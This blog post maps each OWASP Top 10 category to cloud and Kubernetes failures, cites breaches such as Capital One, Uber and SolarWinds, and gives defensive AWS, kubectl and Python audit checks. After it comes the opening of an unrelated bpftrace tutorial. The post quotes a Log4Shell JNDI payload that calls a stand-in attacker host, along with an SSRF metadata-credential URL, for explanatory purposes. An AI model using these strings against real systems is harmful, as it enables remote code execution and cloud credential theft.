OWASP Top 10 Mapped to Cloud Infrastructure: Beyond Web Apps

Reading Time: 11 minutes

What is purple team security · OWASP Top 10 mapped to cloud infrastructure · EP03: Cloud security breaches 2020–2025


TL;DR

  • Mapping the OWASP Top 10 to cloud infrastructure shows that every category has a direct cloud-native equivalent; this is not a web-app-only taxonomy
  • A01 Broken Access Control = IAM wildcards, public S3, overly permissive trust policies
  • A07 Authentication Failures = MFA fatigue, session token theft, push-notification abuse
  • A08 Software/Data Integrity = compromised build pipelines, unsigned container images, secrets in CI/CD
  • A10 SSRF = EC2 metadata endpoint abuse, IMDSv1 credential theft (the Capital One attack vector)
  • Every major cloud breach 2020–2025 lands in one of these ten categories — the taxonomy was always infrastructure-applicable

OWASP Mapping: All categories — A01 through A10. This episode is the reference map for the entire series.


The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│           OWASP TOP 10 → CLOUD INFRASTRUCTURE MAPPING              │
│                                                                     │
│  OWASP (2021)              CLOUD EQUIVALENT          REAL BREACH    │
│  ─────────────────────────────────────────────────────────────────  │
│  A01 Broken Access Ctrl  → IAM wildcards, public S3  Capital One    │
│  A02 Cryptographic Fail  → Plaintext secrets, weak   CircleCI       │
│                            KMS config                               │
│  A03 Injection           → Log4j JNDI, SSRF as       Log4Shell      │
│                            injection variant                        │
│  A04 Insecure Design     → --privileged containers   runc CVEs      │
│                            no seccomp/AppArmor                      │
│  A05 Security Misconfig  → K8s RBAC defaults, open   Multiple       │
│                            etcd ports                               │
│  A06 Vulnerable Comps    → Transitive deps, outdated  XZ Utils      │
│                            base images                              │
│  A07 Auth Failures       → MFA fatigue, stolen        Uber, Okta    │
│                            session tokens                           │
│  A08 SW/Data Integrity   → Unsigned artifacts,        SolarWinds    │
│                            compromised pipelines                    │
│  A09 Logging/Monitoring  → Missing CloudTrail,        Most          │
│                            no workload telemetry                    │
│  A10 SSRF                → EC2 IMDS abuse, metadata  Capital One    │
│                            credential theft                         │
└─────────────────────────────────────────────────────────────────────┘

OWASP Top 10 cloud infrastructure mapping is not a translation exercise — it is a recognition that the same classes of failure that compromise web applications also compromise cloud infrastructure, Kubernetes clusters, and CI/CD pipelines. The language shifts; the attack classes don’t.


Why Engineers Treat OWASP as a Web-App-Only Concern

I kept hearing OWASP Top 10 in web application security reviews. The AppSec team ran it through their checklist. The infrastructure team shrugged — “that’s for the developers.” Then I looked at the actual cloud breaches: Capital One, Uber, CircleCI, SolarWinds. Every one of them mapped to an OWASP category.

The confusion comes from OWASP’s origins. The project started in 2001 focused on web application vulnerabilities. SQL injection, XSS, broken authentication against HTTP endpoints. The cloud and container ecosystem didn’t exist. So the examples stayed web-application-centric even as the underlying failure classes proved universal.

The 2021 OWASP Top 10 update is more abstracted than its predecessors — intentionally. “Broken Access Control” doesn’t say “SQL injection.” It says access control. That applies to every IAM policy that has "Action": "*" where it shouldn’t.

This episode makes the mapping explicit. One OWASP category at a time.


A01: Broken Access Control — IAM Wildcards and Public S3

Web equivalent: A user can access other users’ records by modifying the URL parameter.

Cloud equivalent: An IAM role with "Action": "*" on "Resource": "*". An S3 bucket with public read. A cross-account trust policy that allows any principal in the account, not just a specific role.

Broken access control in cloud infrastructure means the principal can reach a resource it should not be able to reach, because the access control decision was not made or was made incorrectly.
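
The wildcard case can be checked offline against a policy document. The following is a minimal sketch, assuming the policy has already been exported as JSON; the function names and the sample policy are hypothetical, and it only catches the literal `"*"` on both Action and Resource, not narrower wildcards such as `s3:*`.

```python
import json


def _as_list(value):
    """IAM accepts a single value or a list; normalize to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def find_wildcard_statements(policy):
    """Return Allow statements that grant every action on every resource."""
    flagged = []
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        actions = _as_list(stmt.get("Action"))
        resources = _as_list(stmt.get("Resource"))
        if "*" in actions and "*" in resources:
            flagged.append(stmt)
    return flagged


# Hypothetical policy document, for illustration only.
SAMPLE_POLICY = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "TooBroad", "Effect": "Allow", "Action": "*", "Resource": "*"},
    {"Sid": "Scoped", "Effect": "Allow",
     "Action": ["s3:GetObject"], "Resource": "arn:aws:s3:::example-bucket/*"}
  ]
}
""")

if __name__ == "__main__":
    for stmt in find_wildcard_statements(SAMPLE_POLICY):
        print("WILDCARD STATEMENT:", stmt.get("Sid", "<no Sid>"))
```

A real review would also need to look at NotAction, conditions, and trust policies; this sketch only shows the shape of the simplest check.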

The Capital One breach (March 2019, disclosed that July) is the canonical example. A WAF running on EC2 had an IAM role attached. That role had permissions to list and retrieve objects from S3 buckets. SSRF against the WAF reached the EC2 metadata endpoint and retrieved the IAM role credentials. Those credentials were then used to access roughly 100 million customer records. The SSRF was A10. The fact that the WAF had access to customer data S3 buckets was A01.

# Check the account-level S3 Block Public Access settings
aws s3control get-public-access-block --account-id "$(aws sts get-caller-identity --query Account --output text)"

# Find buckets with no bucket-level block, or with any of the four settings disabled
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read -r bucket; do
    result=$(aws s3api get-public-access-block --bucket "$bucket" 2>/dev/null)
    # An empty result means the bucket has no public access block configuration at all
    if [ -z "$result" ] || echo "$result" | grep -q ': false'; then
      echo "PUBLIC ACCESS NOT FULLY BLOCKED: $bucket"
    fi
  done

A02: Cryptographic Failures — Plaintext Secrets and Weak KMS Config

Web equivalent: Passwords stored as MD5 hashes. Credit card numbers in plaintext in the database.

Cloud equivalent: DATABASE_URL=postgres://user:password@host/db in a .env file committed to a public repository. An S3 bucket with sensitive data where server-side encryption is not enforced. KMS key policies that allow kms:Decrypt to any principal in the account.

Cryptographic failures in the cloud are less about broken algorithms and more about secrets that aren’t secret. The CircleCI breach (January 2023) exposed customer secrets — API tokens, AWS credentials, private keys — that customers had stored in CircleCI’s environment variables. The attacker compromised CircleCI’s infrastructure and exfiltrated those secrets. The cryptographic failure was that secrets were stored in a way that could be exfiltrated when the platform was compromised, rather than being bound to hardware or using short-lived credentials that couldn’t be replayed.
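
Secrets of the kind described above can often be spotted with simple pattern matching before they reach a repository. The following is a minimal sketch, not a replacement for a dedicated scanner: the two regular expressions (AWS access key IDs beginning with AKIA or ASIA, and URLs with an embedded password) and the sample lines are illustrative assumptions, and the key shown is AWS's documented example value.

```python
import re

# Access key IDs: AKIA (long-term) or ASIA (temporary) followed by 16 characters.
AWS_KEY_ID = re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")
# scheme://user:password@host style connection strings.
URL_WITH_PASSWORD = re.compile(r"[a-z][a-z0-9+.-]*://[^/\s:@]+:[^/\s@]+@", re.IGNORECASE)


def scan_lines(lines):
    """Return (line_number, finding_type) pairs for lines that look like secrets."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        if URL_WITH_PASSWORD.search(line):
            findings.append((lineno, "url-embedded-password"))
        if AWS_KEY_ID.search(line):
            findings.append((lineno, "aws-access-key-id"))
    return findings


# Hypothetical .env contents, for illustration only.
SAMPLE_ENV = [
    "DATABASE_URL=postgres://user:password@host/db",
    "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE",
    "LOG_LEVEL=info",
]

if __name__ == "__main__":
    for lineno, kind in scan_lines(SAMPLE_ENV):
        print(f"line {lineno}: {kind}")
```

Pattern matching only finds secrets that follow a recognizable format; short-lived credentials remain the stronger control because a leaked value expires.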

# Check if default EBS encryption is enabled (prevents data at rest failures)
aws ec2 get-ebs-encryption-by-default --region us-east-1

# Check for S3 buckets without default encryption
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read bucket; do
    enc=$(aws s3api get-bucket-encryption --bucket "$bucket" 2>/dev/null)
    if [ -z "$enc" ]; then
      echo "NO DEFAULT ENCRYPTION: $bucket"
    fi
  done

A03: Injection — Log4Shell and SSRF as Injection Variants

Web equivalent: SQL injection via unsanitized query parameters.

Cloud equivalent: Log4Shell (CVE-2021-44228) used JNDI lookup injection via HTTP headers to execute arbitrary code in Java applications. SSRF (Server-Side Request Forgery) is an injection variant where attacker-controlled input causes the server to make requests to internal endpoints — including http://169.254.169.254/latest/meta-data/.

Log4Shell (December 2021) demonstrated injection against infrastructure directly. The User-Agent or X-Forwarded-For header contained ${jndi:ldap://attacker.com/exploit}. The logging framework evaluated it. The outcome was remote code execution on any Java application that logged the header with a vulnerable Log4j 2.x release (2.0-beta9 through 2.14.1).

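The fix was not “validate user input better.” The fix was patching Log4j and, for SSRF, enforcing IMDSv2, which issues a session token only in response to a PUT request and requires that token as a header on every metadata read. A naive SSRF that can only issue GET requests cannot complete that exchange.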

# Check if all EC2 instances require IMDSv2 (prevents SSRF-to-metadata attacks)
aws ec2 describe-instances \
  --query 'Reservations[].Instances[].{ID:InstanceId,IMDSv2:MetadataOptions.HttpTokens}' \
  --output table
# Desired: HttpTokens = "required" for all instances

A04: Insecure Design — Privileged Containers and Missing Runtime Controls

Web equivalent: Application architecture where any authenticated user can reach administrative functions without additional authorization checks.

Cloud equivalent: A container run with --privileged (Docker) or securityContext.privileged: true (Kubernetes), or with allowPrivilegeEscalation: true. A Kubernetes pod without a securityContext restricting capabilities. A cluster with no admission controller enforcing pod security standards.

Insecure design in the container context means the security controls that should prevent container breakout were never there. They weren’t removed; they were never designed in. Namespace isolation does not hold against a container that has CAP_SYS_ADMIN, because that capability permits operations such as mounting filesystems that can be used to reach the host. The attacker doesn’t exploit a vulnerability; they use capabilities the design granted.
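
The same design review can be run against a pod manifest before it is ever deployed. The following is a minimal sketch, assuming the pod has been loaded as a dictionary (for example from `kubectl get pod -o json`); the function name, the reason strings, and the sample pod are hypothetical. It treats an unset allowPrivilegeEscalation as a finding because the Restricted Pod Security Standard requires it to be explicitly false.

```python
def risky_settings(pod):
    """Return (container_name, reason) pairs for settings that weaken isolation."""
    findings = []
    for container in pod.get("spec", {}).get("containers", []):
        name = container.get("name", "<unnamed>")
        ctx = container.get("securityContext") or {}
        if ctx.get("privileged") is True:
            findings.append((name, "privileged"))
        # Anything other than an explicit false is flagged.
        if ctx.get("allowPrivilegeEscalation") is not False:
            findings.append((name, "allowPrivilegeEscalation not false"))
        added = (ctx.get("capabilities") or {}).get("add") or []
        if "SYS_ADMIN" in added or "CAP_SYS_ADMIN" in added:
            findings.append((name, "SYS_ADMIN capability added"))
    return findings


# Hypothetical pod, for illustration only.
SAMPLE_POD = {
    "metadata": {"namespace": "default", "name": "debug-tools"},
    "spec": {
        "containers": [
            {"name": "shell", "securityContext": {"privileged": True}},
            {"name": "app", "securityContext": {
                "allowPrivilegeEscalation": False,
                "capabilities": {"drop": ["ALL"]}}},
            {"name": "agent", "securityContext": {
                "allowPrivilegeEscalation": False,
                "capabilities": {"add": ["SYS_ADMIN"]}}},
        ]
    },
}

if __name__ == "__main__":
    for name, reason in risky_settings(SAMPLE_POD):
        print(f"{name}: {reason}")
```

An admission controller enforces the same rules at deploy time; a script like this is only useful for auditing manifests that already exist.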

# Find pods with a privileged container, or without pod-level runAsNonRoot
# any() reports each pod once, even when several containers match
kubectl get pods -A -o json | \
  jq -r '.items[] |
    select(
      any(.spec.containers[]; .securityContext.privileged == true) or
      (.spec.securityContext.runAsNonRoot != true)
    ) |
    "\(.metadata.namespace)/\(.metadata.name)"'

A05: Security Misconfiguration — Default Kubernetes RBAC and Open Ports

Web equivalent: Default admin credentials not changed. Directory listing enabled on the web server.

Cloud equivalent: A ClusterRoleBinding that grants cluster-admin to the default service account. etcd port 2379 reachable from the pod network. AWS security groups that allow 0.0.0.0/0 on port 22.

Security misconfiguration in Kubernetes is particularly common because the defaults in older Kubernetes versions were not secure-by-default. The default service account in each namespace mounts a service account token that can authenticate to the API server. In clusters without RBAC properly configured, that token can enumerate and modify resources.
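
The open-security-group case from the list above can be checked against exported data. The following is a minimal sketch, assuming input shaped like the SecurityGroups list returned by `aws ec2 describe-security-groups`; the function name and the sample group IDs are hypothetical.

```python
def open_to_world(groups, port=22):
    """Return IDs of security groups that allow `port` from any IPv4 or IPv6 address."""
    flagged = []
    for group in groups:
        for perm in group.get("IpPermissions", []):
            proto = perm.get("IpProtocol")
            if proto == "-1":
                # "-1" means all protocols and all ports.
                covers_port = True
            elif proto == "tcp":
                covers_port = perm.get("FromPort", 0) <= port <= perm.get("ToPort", 65535)
            else:
                covers_port = False
            from_anywhere = (
                any(r.get("CidrIp") == "0.0.0.0/0" for r in perm.get("IpRanges", []))
                or any(r.get("CidrIpv6") == "::/0" for r in perm.get("Ipv6Ranges", []))
            )
            if covers_port and from_anywhere:
                flagged.append(group.get("GroupId"))
                break  # one matching rule is enough to flag the group
    return flagged


# Hypothetical security groups, for illustration only.
SAMPLE_GROUPS = [
    {"GroupId": "sg-0aaa", "IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}]}]},
    {"GroupId": "sg-0bbb", "IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}]}]},
    {"GroupId": "sg-0ccc", "IpPermissions": [
        {"IpProtocol": "-1", "Ipv6Ranges": [{"CidrIpv6": "::/0"}]}]},
    {"GroupId": "sg-0ddd", "IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
         "IpRanges": [{"CidrIp": "10.0.0.0/8"}]}]},
]

if __name__ == "__main__":
    for group_id in open_to_world(SAMPLE_GROUPS):
        print("SSH OPEN TO WORLD:", group_id)
```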

# Check what the default service account can do in a namespace
kubectl auth can-i --list --as=system:serviceaccount:default:default -n default

# Find ClusterRoleBindings that bind cluster-admin to non-system subjects
kubectl get clusterrolebindings -o json | \
  jq '.items[] | 
    select(.roleRef.name == "cluster-admin") | 
    {name: .metadata.name, subjects: .subjects}'

A06: Vulnerable and Outdated Components — Transitive Dependencies and Base Images

Web equivalent: An npm package in the dependency tree has a known CVE. The application ships with an outdated version of OpenSSL.

Cloud equivalent: A container base image built from ubuntu:20.04 six months ago, now carrying 47 critical CVEs in installed packages. A Lambda function with a vendored boto3 version that has a known vulnerability. XZ Utils (CVE-2024-3094) — a backdoor inserted into the release tarball of a compression library present in almost every major Linux distribution.

XZ Utils is the defining example of this category in the infrastructure context. The attack was supply chain: two years of social engineering against a maintainer, gaining commit access, then inserting a backdoor in the release tarball rather than the source repository (so source audits wouldn’t catch it). The XZ backdoor targeted SSH servers on systems using systemd. Had it reached stable releases, it would have given the attacker remote code execution on SSH servers across Fedora, Debian, and Ubuntu. It was caught roughly five weeks after the first backdoored release, while it was still confined to development and pre-release branches.

# Scan a container image for known CVEs (requires trivy)
trivy image --severity HIGH,CRITICAL your-registry/your-image:tag

# Check Lambda function runtime versions against AWS's deprecation schedule
aws lambda list-functions \
  --query 'Functions[].{Name:FunctionName,Runtime:Runtime,LastModified:LastModified}' \
  --output table

A07: Identification and Authentication Failures — MFA Fatigue and Stolen Tokens

Web equivalent: Session tokens that don’t expire. Password reset links that work indefinitely.

Cloud equivalent: Push-notification MFA that can be exhausted by fatigue attacks. AWS console sessions with 12-hour validity. OAuth tokens stored in browser local storage. SAML assertions that can be replayed.

The Uber breach (September 2022) is the canonical cloud/SaaS example. A contractor’s credentials were obtained via social engineering. The attacker sent repeated Duo push notifications — the contractor rejected them. The attacker then sent a WhatsApp message claiming to be IT support and asking the contractor to accept the next notification. They did. From there, the attacker found a network share containing a PowerShell script with hardcoded admin credentials for Uber’s Thycotic PAM system — full access to the Uber internal network.

The authentication failure was two-layered: push MFA that could be fatigue-attacked, and credentials stored in plaintext in an accessible location.
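
The first layer can be audited from the IAM credential report. The following is a minimal sketch, assuming the report has already been downloaded and base64-decoded to CSV text; the function name and the sample rows are hypothetical, and the sample keeps only the first eight of the report's columns.

```python
import csv
import io


def console_users_without_mfa(report_csv):
    """Return users that have a console password but no MFA device."""
    reader = csv.DictReader(io.StringIO(report_csv))
    return [
        row["user"]
        for row in reader
        if row["password_enabled"] == "true" and row["mfa_active"] == "false"
    ]


# Hypothetical, trimmed credential report for illustration only.
SAMPLE_REPORT = """\
user,arn,user_creation_time,password_enabled,password_last_used,password_last_changed,password_next_rotation,mfa_active
<root_account>,arn:aws:iam::111122223333:root,2020-01-01T00:00:00+00:00,not_supported,no_information,not_supported,not_supported,true
alice,arn:aws:iam::111122223333:user/alice,2021-05-01T00:00:00+00:00,true,2024-01-01T00:00:00+00:00,2023-01-01T00:00:00+00:00,N/A,false
ci-bot,arn:aws:iam::111122223333:user/ci-bot,2022-02-02T00:00:00+00:00,false,N/A,N/A,N/A,false
"""

if __name__ == "__main__":
    for user in console_users_without_mfa(SAMPLE_REPORT):
        print("NO MFA:", user)
```

Users without a console password (such as the hypothetical ci-bot) are skipped because MFA enrollment only matters for interactive sign-in; their access keys need a separate review.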

# Check whether the root account has MFA enabled (1 = enabled)
aws iam get-account-summary | jq '{AccountMFAEnabled: .SummaryMap.AccountMFAEnabled}'

# Find specific users without MFA
aws iam list-users --query 'Users[].UserName' --output text | \
  tr '\t' '\n' | \
  while read user; do
    mfa=$(aws iam list-mfa-devices --user-name "$user" --query 'MFADevices' --output text)
    if [ -z "$mfa" ]; then
      echo "NO MFA: $user"
    fi
  done

A08: Software and Data Integrity Failures — Compromised Build Pipelines

Web equivalent: Pulling npm packages without verifying checksums. Deploying a build without artifact signing.

Cloud equivalent: A CI/CD pipeline that pulls dependencies from an unauthenticated source. A container image built from a Dockerfile that pulls the latest version of a base image without pinning the digest. A GitHub Actions workflow that references a third-party action at a mutable tag rather than a commit SHA.

SolarWinds (December 2020) is the infrastructure-scale example. The attacker compromised SolarWinds’ build system. The malicious code (SUNBURST) was inserted into the Orion software build process, signed with SolarWinds’ legitimate code signing certificate, and distributed to approximately 18,000 customers via the normal software update mechanism. The artifact was signed. The signature verified. The code was malicious.

The software integrity failure was that the build pipeline itself was not monitored or hardened — an attacker who controlled the build environment could produce signed, trusted artifacts.
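
One of the cloud equivalents listed above, a workflow that references an action at a mutable tag, is easy to detect in the workflow text itself. The following is a minimal sketch: the function name is hypothetical, the example-org actions in the sample are invented, and the line-based matching is an assumption that will miss unusual YAML layouts.

```python
import re

# Matches "uses: owner/repo@ref" with or without a leading "- " and quotes.
USES = re.compile(r"^\s*(?:-\s*)?uses:\s*['\"]?([^'\"\s#]+)")
# A reference is treated as pinned only if it ends in a full 40-character commit SHA.
PINNED = re.compile(r"@[0-9a-f]{40}$")


def mutable_action_refs(workflow_text):
    """Return action references that are not pinned to a commit SHA."""
    refs = []
    for line in workflow_text.splitlines():
        match = USES.match(line)
        if not match:
            continue
        ref = match.group(1)
        if ref.startswith("./"):
            continue  # local action from the same repository
        if not PINNED.search(ref):
            refs.append(ref)
    return refs


# Hypothetical workflow, for illustration only.
SAMPLE_WORKFLOW = """\
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: example-org/example-action@main
      - uses: example-org/pinned-action@0123456789abcdef0123456789abcdef01234567
      - uses: ./.github/actions/local
"""

if __name__ == "__main__":
    for ref in mutable_action_refs(SAMPLE_WORKFLOW):
        print("MUTABLE REFERENCE:", ref)
```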

# Check GitHub Actions workflows for mutable action references (uses @main or @v1 instead of SHA)
grep -r "uses:" .github/workflows/ | grep -v "@[a-f0-9]\{40\}"

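# Verify a container image digest before deployment
docker pull your-registry/your-image:tag
# .RepoDigests holds the registry digest (image@sha256:...); .Id is only the local image ID
docker inspect --format='{{index .RepoDigests 0}}' your-registry/your-image:tag
# Compare this registry digest to the pinned value in your deployment manifest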

A09: Security Logging and Monitoring Failures — What You Can’t See, You Can’t Stop

Web equivalent: No access logs on the web server. No alerting on repeated failed login attempts.

Cloud equivalent: CloudTrail not enabled in all regions. VPC Flow Logs disabled. No GuardDuty. Container workloads with no runtime security monitoring. Lambda functions that log errors to /dev/null.

This is the category that causes the 11-day detection time from EP01. The attacker’s techniques generated events. The events were not collected, or collected but not alerting, or alerting but not investigated.

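# Verify a multi-region CloudTrail trail exists (--include-shadow-trails is a flag and takes no value)
aws cloudtrail describe-trails --include-shadow-trails \
  --query 'trailList[?IsMultiRegionTrail==`true`].{Name:Name,Bucket:S3BucketName,HomeRegion:HomeRegion}'
# Then confirm each trail is logging: aws cloudtrail get-trail-status --name <trail-name> --query IsLogging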

# Check which regions have GuardDuty disabled
for region in $(aws ec2 describe-regions --query 'Regions[].RegionName' --output text); do
  status=$(aws guardduty list-detectors --region "$region" --query 'DetectorIds' --output text 2>/dev/null)
  if [ -z "$status" ]; then
    echo "GUARDDUTY DISABLED: $region"
  fi
done

A10: Server-Side Request Forgery (SSRF) — EC2 Metadata and IMDSv1

Web equivalent: An application fetches a URL provided by the user. The user provides http://internal-service/admin.

Cloud equivalent: An application fetches a URL provided by the user (or constructed from user input). The user provides http://169.254.169.254/latest/meta-data/iam/security-credentials/. The response contains temporary IAM credentials valid for the attached instance role.

This is how the Capital One breach worked. A WAF instance had an SSRF vulnerability. The attacker exploited it to reach the EC2 Instance Metadata Service (IMDS). IMDSv1 has no authentication: any HTTP GET to the metadata endpoint from inside the instance returns credentials. Those credentials had overly permissive S3 access (A01). The result was roughly 100 million records exfiltrated.

IMDSv2 requires a PUT request to get a session token before credentials can be retrieved, so an SSRF that can only issue GET requests cannot retrieve IMDSv2 credentials. Enforcing IMDSv2 closes the SSRF-to-credentials path.
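
The two-step exchange can be sketched with the standard library. This is an illustration under stated assumptions rather than a hardened client: the function names are hypothetical, the header names and token path are the ones AWS documents for IMDSv2, and `fetch_role_names` only works when run on an EC2 instance.

```python
import urllib.request

IMDS = "http://169.254.169.254"


def token_request(ttl_seconds=21600):
    """Step 1: a PUT request that asks IMDSv2 for a session token."""
    return urllib.request.Request(
        f"{IMDS}/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )


def credentials_request(token, role_name=""):
    """Step 2: a GET request that must carry the session token as a header."""
    return urllib.request.Request(
        f"{IMDS}/latest/meta-data/iam/security-credentials/{role_name}",
        headers={"X-aws-ec2-metadata-token": token},
    )


def fetch_role_names(timeout=2):
    """Run both steps against the real endpoint (EC2 instances only)."""
    with urllib.request.urlopen(token_request(), timeout=timeout) as resp:
        token = resp.read().decode()
    with urllib.request.urlopen(credentials_request(token), timeout=timeout) as resp:
        return resp.read().decode().split()
```

An attacker who controls only the URL of a server-side GET has no way to send the PUT in step 1 or to attach the header in step 2, which is the property the paragraph above relies on.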

# Check all EC2 instances for IMDSv1 (HttpTokens != "required" means vulnerable)
aws ec2 describe-instances \
  --query 'Reservations[].Instances[].{
    ID:InstanceId,
    Name:Tags[?Key==`Name`]|[0].Value,
    IMDSv2:MetadataOptions.HttpTokens,
    State:State.Name
  }' \
  --output table

# Enforce IMDSv2 on a specific instance
aws ec2 modify-instance-metadata-options \
  --instance-id i-0123456789abcdef0 \
  --http-tokens required \
  --http-endpoint enabled

The Series Attack Map: Which Episodes Cover Which Categories

OWASP Category                     Purple Team Episode
─────────────────────────────────────────────────────────────────────────────
A01 Broken Access Control          EP04: Broken access control in AWS
A02 Cryptographic Failures         EP06 (partial): CI/CD secrets exposure
A03 Injection                      EP07: SSRF to cloud metadata
A04 Insecure Design                EP08: Kubernetes container escape
A05 Security Misconfiguration      EP08: Kubernetes container escape
A06 Vulnerable Components          EP09: Supply chain attacks
A07 Authentication Failures        EP05: MFA fatigue attacks
A08 SW/Data Integrity              EP06: CI/CD secrets exposure, EP09: Supply chain
A09 Logging/Monitoring Failures    EP11: Detection engineering with eBPF
A10 SSRF                           EP07: SSRF to cloud metadata

Run This in Your Own Environment: OWASP Coverage Self-Assessment

Run this against your AWS account and record the results as your OWASP A01–A10 baseline before the EP04 exercise:

#!/bin/bash
# Purple Team EP02 — OWASP Cloud Coverage Check
# Run in an account with read-only IAM permissions

echo "=== A01: Broken Access Control ==="
echo "--- S3 public access block status ---"
aws s3control get-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text) 2>/dev/null || \
  echo "WARN: Account-level public access block not set"

echo ""
echo "=== A02: Cryptographic Failures ==="
echo "--- EBS default encryption ---"
aws ec2 get-ebs-encryption-by-default --query 'EbsEncryptionByDefault' --output text

echo ""
echo "=== A07: Authentication Failures ==="
echo "--- IAM users without MFA ---"
aws iam generate-credential-report 2>/dev/null
sleep 3
aws iam get-credential-report --query 'Content' --output text | base64 -d | \
  awk -F',' 'NR>1 && $4=="true" && $8=="false" {print "NO MFA: "$1}'

echo ""
echo "=== A09: Logging/Monitoring Failures ==="
echo "--- GuardDuty status in current region ---"
# list-detectors exits 0 with empty output when GuardDuty is off, so test the output
detectors=$(aws guardduty list-detectors --query 'DetectorIds' --output text)
[ -n "$detectors" ] && echo "$detectors" || echo "DISABLED"
echo "--- CloudTrail multi-region trail ---"
# describe-trails also exits 0 when no trail matches
trails=$(aws cloudtrail describe-trails --query 'trailList[?IsMultiRegionTrail==`true`].Name' --output text)
[ -n "$trails" ] && echo "$trails" || echo "WARN: No multi-region trail"

echo ""
echo "=== A10: SSRF ==="
echo "--- EC2 instances with IMDSv1 enabled ---"
aws ec2 describe-instances \
  --query 'Reservations[].Instances[?MetadataOptions.HttpTokens!=`required`].{ID:InstanceId,IMDS:MetadataOptions.HttpTokens}' \
  --output table

⚠ Common Mistakes When Mapping OWASP to Infrastructure

Treating it as a checklist, not a threat model. OWASP categories are not yes/no checkboxes. “Is broken access control present?” is not a question with a binary answer. The question is: which resources are accessible to which principals, and is that access correct given the intended design?

Ignoring A09 (Logging/Monitoring) until the breach. The other nine categories are about preventing or limiting the attack. A09 is about knowing it happened. Without A09 controls, you will not know you were breached until a third party tells you.

Fixing web-layer controls and ignoring the infrastructure equivalents. An organization that scores well on OWASP in their web application pen test may still have public S3 buckets, IMDSv1 enabled everywhere, and no CloudTrail in us-west-1. The mapping in this episode applies to infrastructure — run it separately from your application security assessments.

Conflating A06 (Vulnerable Components) with just “patch management.” XZ Utils was fully patched in the affected timeframe — the malicious version was the latest release. A06 in the supply chain context is about verifying the integrity of what you install, not just its version number.


Quick Reference

OWASP   Cloud Infrastructure Equivalent                                 Detection Tool
──────────────────────────────────────────────────────────────────────────────────────────────────
A01     IAM wildcards, public S3, broad trust policies                  AWS Config, CloudTrail
A02     Plaintext secrets in env vars, unencrypted S3                   TruffleHog, Macie
A03     SSRF, Log4j JNDI injection                                      WAF logs, CloudTrail IMDS calls
A04     Privileged containers, no seccomp                               OPA/Gatekeeper, Falco
A05     K8s RBAC defaults, open etcd, open SGs                          kube-bench, AWS Config
A06     Unpatched base images, transitive CVEs, supply chain            Trivy, Grype, SLSA
A07     MFA fatigue, long-lived sessions, stolen tokens                 GuardDuty, Okta logs
A08     Unsigned images, mutable CI references, build compromise        Cosign, SLSA, OIDC
A09     No CloudTrail, no GuardDuty, no runtime telemetry               AWS Security Hub
A10     IMDSv1 on EC2, SSRF to internal endpoints                       VPC Flow Logs, CloudTrail

Key Takeaways

  • OWASP Top 10 is a threat taxonomy — every category has a cloud, Kubernetes, or Linux infrastructure equivalent
  • A01 (Broken Access Control) is the most common cloud failure: IAM wildcards, public S3, and overly broad trust policies
  • A10 (SSRF) is what enabled the Capital One breach — IMDSv1 on EC2 makes any SSRF a credential theft path
  • A08 (Software/Data Integrity) is the SolarWinds attack class — supply chain compromise of the build pipeline itself
  • A09 (Logging/Monitoring) is the category that turns the other nine from “detectable breach” into “11-day dwell time”
  • Fixing the other nine categories without A09 means you improve your controls but still won’t know when they’re bypassed
  • Run the OWASP coverage self-assessment above and record your baseline before starting the episode exercises

What’s Next

EP03 is the breach landscape: six major incidents from December 2020 (SolarWinds) through March 2024 (XZ Utils). Each one maps to the OWASP categories from this episode. The pattern across all six is three root causes (identity, supply chain, misconfiguration), and understanding that pattern tells you where to spend your next purple team exercise. The cloud security breaches from 2020 to 2025 are the empirical record this series is built on.

Get EP03 in your inbox when it publishes → subscribe at linuxcent.com

bpftrace — Kernel Answers in One Line

Reading Time: 8 minutes

eBPF: From Kernel to Cloud, Episode 9
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf · XDP · TC eBPF · bpftrace


Architecture Overview

Figure: bpftrace and eBPF tracing. Dynamic kernel observability, showing probe types and the output pipeline.
bpftrace attaches probes at runtime — no recompilation, no restarts, full kernel visibility in one line.

TL;DR

  • bpftrace is an eBPF compiler, not a monitoring agent — every one-liner compiles, loads, runs, and cleans up a complete kernel program
    (think of it like kubectl exec — but for asking the kernel a direct question, with no agent, no sidecar, no prior setup)
  • kretprobe and tracepoint cover most production debugging needs; use tracepoints for stability across kernel versions
  • The security use cases are unique: kernel-level observation that an attacker inside a container cannot suppress
  • Every connection, every file open, every process spawn — observable in real time with a single command, no prior instrumentation
  • Production caution: high-frequency probes on hot paths add overhead; filter by pid/comm, use --timeout, watch %si
  • Container PIDs are host-namespace PIDs in bpftrace — use curtask->real_parent->tgid to correlate to container activity

bpftrace turns any kernel question into a one-liner — compiling, loading, and attaching a complete eBPF program in seconds, with no agents, no restarts, and no prior instrumentation on the node. When something is wrong on a node right now and you don’t know where to look, it’s how you ask the kernel a direct question. That’s what EP09 is about.

Quick Check: Is bpftrace Available on Your Node?

Before the one-liner toolkit — verify bpftrace is installed and working on a cluster node:

# SSH into a worker node, then:
bpftrace --version
# bpftrace v0.19.0   ← any version ≥ 0.16 supports the patterns in this episode

# Verify BTF is available (required for struct access one-liners)
ls /sys/kernel/btf/vmlinux && echo "BTF available"

# The simplest possible one-liner — count syscalls for 5 seconds
bpftrace -e 'tracepoint:raw_syscalls:sys_enter { @[comm] = count(); }' --timeout 5

Expected output (abridged):

Attaching 1 probe...

@[containerd]: 312
